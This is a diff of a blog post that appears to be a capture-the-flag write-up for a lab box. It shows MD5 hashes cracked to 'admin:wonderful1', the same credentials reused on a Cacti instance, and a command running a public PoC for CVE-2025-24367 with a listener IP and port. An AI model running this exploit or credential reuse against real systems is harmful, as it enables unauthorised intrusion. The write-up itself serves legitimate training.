innocentx0/innocentx0.github.io/_posts/2025-12-14-php-docker-more.md

 ```
 Taking a look , we notice the password hashing method is very insecure, MD5..
 Using a simple site as [CrackStation](https://crackstation.net/)
-we receive the decodable hashes
+we receive the decodable hashes:
 <img width="682" height="341" alt="image" src="https://github.com/user-attachments/assets/48a8c2c0-d120-4ccd-87fa-ce30323351c6" />

 So we have:
-`admin:wonderful1`
+`admin:wonderful1` <br>
-We can now access the admin dashboard, but nothing interesting is inside
+We can now access the admin dashboard, but nothing interesting is inside.

 <img width="1841" height="827" alt="image" src="https://github.com/user-attachments/assets/86d771f8-ee2b-4152-8c20-081e8e4ca389" />

 ### CVE-2025-24367 Exploitation
-Spreading credentials found over cacti, we signed in , for the exploitation part we can use this [PoC](https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC)
+Spreading credentials found before over cacti, we signed in.
+For the exploitation part we can use this [PoC](https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC)

  ```bash
  python3 exploit.py -u marcus -p wonderful1 -i 10.10.14.34 -l 4242 -url  cacti.monitorsfour.htb